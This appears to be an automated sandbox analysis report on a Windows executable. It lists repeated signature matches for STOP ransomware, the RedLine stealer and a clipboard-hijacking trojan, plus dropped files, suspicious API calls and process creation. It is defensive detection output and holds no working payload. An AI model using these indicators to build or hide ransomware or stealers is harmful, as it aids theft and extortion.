Source: 00000011.00000000.365343536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000011.00000000.365343536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000011.00000000.365343536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000003.00000002.318350093.00000000020FB000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000000.317037787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000005.00000000.317037787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000005.00000000.317037787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000011.00000000.363751420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000002.309064408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000000.322395529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000006.00000000.322395529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000006.00000000.322395529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000005.00000000.314284082.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000005.00000000.313991274.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000006.00000000.323671151.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000006.00000000.323671151.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000006.00000000.323671151.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000011.00000000.366169302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000011.00000000.366169302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000011.00000000.366169302.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000003.00000002.318481347.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.346399832.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000009.00000000.346399832.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.346399832.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000010.00000002.378615646.0000000002230000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000002.353616538.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000009.00000002.353616538.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000002.353616538.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.303182079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000001.00000000.303182079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000000.303182079.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.302301176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000001.00000000.302301176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000000.302301176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000000.301786839.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000011.00000000.364114264.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000011.00000000.364114264.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000011.00000000.364114264.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: U59WtZz2Sg.exe PID: 5228, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: U59WtZz2Sg.exe PID: 3692, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: U59WtZz2Sg.exe PID: 1272, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: U59WtZz2Sg.exe PID: 3184, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: U59WtZz2Sg.exe PID: 6132, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\flapper.gif, type: DROPPED Matched rule: SUSP_GIF_Anomalies date = 2020-07-02, author = Florian Roth, description = Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type, score = https://en.wikipedia.org/wiki/GIF
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ScreenshotOptIn.gif, type: DROPPED Matched rule: SUSP_GIF_Anomalies date = 2020-07-02, author = Florian Roth, description = Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type, score = https://en.wikipedia.org/wiki/GIF
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\AutoPlayOptIn.gif, type: DROPPED Matched rule: SUSP_GIF_Anomalies date = 2020-07-02, author = Florian Roth, description = Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type, score = https://en.wikipedia.org/wiki/GIF
Source: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\flapper.gif, type: DROPPED Matched rule: SUSP_GIF_Anomalies date = 2020-07-02, author = Florian Roth, description = Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type, score = https://en.wikipedia.org/wiki/GIF
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\adm\OneDrive.adml, type: DROPPED Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, score = , license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, modified = 2022-08-19
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPED Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe, type: DROPPED Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build3[1].exe, type: DROPPED Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\build3[1].exe, type: DROPPED Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Creates files inside the system directory
Source: C:\Windows\System32\wbem\WMIADAP.exe File created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: String function: 004065D4 appears 31 times
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: String function: 0042F7C0 appears 56 times
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: String function: 0044F23E appears 44 times
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: String function: 00428520 appears 57 times
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: String function: 004547A0 appears 31 times
PE file contains executable resources (Code or Archives)
Source: U59WtZz2Sg.exe Static PE information: Resource name: RT_VERSION type: x86 executable not stripped
Source: build2[1].exe.5.dr Static PE information: Resource name: RT_VERSION type: x86 executable not stripped
Sample file is different than original file name gathered from version info
Source: U59WtZz2Sg.exe, 00000005.00000003.462575287.0000000000610000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFileSync.LocalizedResources.dll.mui.MUIF vs U59WtZz2Sg.exe
Source: U59WtZz2Sg.exe, 00000005.00000003.445860097.0000000003060000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFileSync.LocalizedResources.dll.mui.MUIF vs U59WtZz2Sg.exe
Source: U59WtZz2Sg.exe, 00000005.00000003.461142803.0000000000610000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFileSync.LocalizedResources.dll.mui.MUIF vs U59WtZz2Sg.exe
Source: U59WtZz2Sg.exe, 00000005.00000003.460215496.0000000000610000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFileSync.LocalizedResources.dll.mui.MUIF vs U59WtZz2Sg.exe
Source: U59WtZz2Sg.exe, 00000005.00000003.450591507.0000000000610000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsipc.dll.muiB vs U59WtZz2Sg.exe
Source: U59WtZz2Sg.exe, 00000005.00000003.463172633.0000000000610000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFileSync.LocalizedResources.dll.mui.MUIF vs U59WtZz2Sg.exe
Source: U59WtZz2Sg.exe, 00000005.00000003.378308612.0000000003077000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDismHost.exej% vs U59WtZz2Sg.exe
Source: U59WtZz2Sg.exe, 00000005.00000003.410994710.0000000003060000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: System.OriginalFileName vs U59WtZz2Sg.exe
Source: U59WtZz2Sg.exe, 00000005.00000003.409368444.0000000003060000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: System.OriginalFileName vs U59WtZz2Sg.exe
Source: U59WtZz2Sg.exe, 00000005.00000003.458323064.0000000000610000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFileSync.LocalizedResources.dll.mui.MUIF vs U59WtZz2Sg.exe
Source: U59WtZz2Sg.exe Static PE information: Section: .data ZLIB complexity 0.9938334668803419
Source: U59WtZz2Sg.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM Jump to behavior
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@32/1330@8/5
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 1_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree, 1_2_00411900
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Code function: 0_2_00403341 GetModuleHandleW,GetNamedPipeHandleStateW,InterlockedExchange,GetConsoleAliasExesLengthW,EnumCalendarInfoW,InterlockedCompareExchange,GetConsoleTitleA,GetLogicalDriveStringsW,FlushFileBuffers,GetShortPathNameA,GetComputerNameExA,CopyFileW,CloseHandle,LoadLibraryA,InterlockedIncrement,InterlockedIncrement,GetCharWidthA,CreateNamedPipeW,WinHttpSetOption,GlobalFlags,FindFirstVolumeA,CreateJobObjectA,GetModuleHandleW,FindResourceA,GetHandleInformation,CancelTimerQueueTimer,VerifyVersionInfoA,InterlockedIncrement,GetCommandLineA,SearchPathA,WriteConsoleOutputA,GetCPInfoExW,GetBinaryTypeA, 0_2_00403341
Source: U59WtZz2Sg.exe Virustotal: Detection: 36%
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe File read: C:\Users\user\Desktop\U59WtZz2Sg.exe Jump to behavior
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe C:\Users\user\Desktop\U59WtZz2Sg.exe
Source: C:\Users\user\Desktop\U59WtZz2Sg.exe Process created: C:\Users\user\Desktop\U59WtZz2Sg.exe C:\Users\user\Desktop\U59WtZz2Sg.exe
